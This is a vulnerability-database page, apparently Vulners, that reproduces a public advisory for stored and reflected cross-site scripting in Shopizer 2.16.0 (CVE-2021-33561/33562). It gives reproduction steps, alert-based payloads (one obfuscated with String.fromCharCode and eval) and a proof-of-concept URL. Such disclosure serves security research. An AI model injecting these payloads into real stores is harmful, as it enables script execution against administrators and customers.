| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Shopizer 跨站脚本漏洞 | 24 May 202100:00 | – | cnnvd | |
| Shopizer 跨站脚本漏洞 | 24 May 202100:00 | – | cnnvd | |
| Shopizer Cross-Site Scripting Vulnerability | 25 May 202100:00 | – | cnvd | |
| Shopizer Cross-Site Scripting Vulnerability (CNVD-2021-38077) | 25 May 202100:00 | – | cnvd | |
| CVE-2021-33561 | 24 May 202122:33 | – | cve | |
| CVE-2021-33562 | 24 May 202122:33 | – | cve | |
| CVE-2021-33561 | 24 May 202122:33 | – | cvelist | |
| CVE-2021-33562 | 24 May 202122:33 | – | cvelist | |
| EUVD-2021-1250 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2021-1395 | 7 Oct 202500:30 | – | euvd |
# Exploit Title: Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 23-05-2021
# Exploit Author: Marek Toth
# Vendor Homepage: https://www.shopizer.com
# Software Link: https://github.com/shopizer-ecommerce/shopizer
# Version: <= 2.16.0
# CVE: CVE-2021-33561, CVE-2021-33562
Stored XSS - 'customer_name' Administration
Description:
A stored cross-site scripting (XSS) vulnerability in Shopizer before version 2.17.0 allows remote attackers to inject arbitrary web script or HTML via customer_name in various forms of store administration and saved in the database. The code is executed for any user of store administration when information is fetched from backend.
Steps to reproduce:
1. Open "http://example.com/admin/" and login to the administration
2. Open "Customers" (http://example.com/admin/customers/list.html) and click on the "Details" button
3. Change customer name to <script>alert(1)</script> and save it
4. Open "Customers" -> XSS payload will trigger
Except "Customers" section, XSS will be executed in "Orders" (/admin/orders/list.html) and "Recent orders" (/admin/home.html)
Reflected XSS - 'ref' parameter
Description:
A reflected cross-site scripting (XSS) vulnerability in Shopizer before version 2.17.0 allows remote attackers to inject arbitrary web script or HTML via the 'ref' parameter.
Payloads:
'+alert(1)+'
'+eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))+'
PoC:
http://example.com/shop/product/vintage-bag-with-leather-bands.html/ref='+alert(1)+'Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation